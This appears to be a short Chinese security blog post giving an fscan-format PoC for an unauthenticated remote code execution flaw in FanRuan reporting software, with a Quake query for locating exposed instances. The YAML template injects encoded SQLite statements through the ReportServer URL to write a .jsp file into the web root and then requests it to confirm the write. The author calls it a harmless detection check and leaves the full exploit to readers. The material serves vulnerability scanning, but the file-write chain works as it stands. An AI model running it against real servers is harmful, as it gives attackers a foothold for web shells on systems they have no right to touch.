帆软最新漏洞 | 集成一下fscan的poc

预览

Quake

http_path: "/webroot/decision/login"

参考了一下甜甜圈师傅发的Poc

漏洞复现 | 帆软 最新未授权 RCE (qq.com)

`params: []``name: 帆软sqlite-uploadjsp``set:`  `r1: randomInt(100, 1000)`  `r2: randomLowercase(6)``rules:``- method: GET`  `path: /webroot/decision/view/ReportServer?test=s&n=${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFATTACH%20DATABASE%20%27..%2Fwebapps%2Fwebroot%2F{{r2}}.jsp%27%20as%20{{r2}}%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFCREATE%20TABLE%20{{r2}}.exp2%28data%20text%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%EF%BB%BFINSERT%20INTO%20{{r2}}.exp2%28data%29%20VALUES%20%28%27{{r1}}%27%29%3B'),1,1)}`  `headers: {}`  `body:`  `search: ""`  `followredirects: false`  `expression: |`    `response.status == 302``- method: GET`  `path: /webroot/{{r2}}.jsp`  `headers: {}`  `body:`  `search: ""`  `followredirects: false`  `expression: |`    `response.status == 200 && response.body.bcontains(bytes(string(r1)))``groups: {}``detail:`  `author: "mlxwl"`  `links: []`  `description: "仅上传无害文件检测漏洞，exp还请自行构造"`  `version: ""`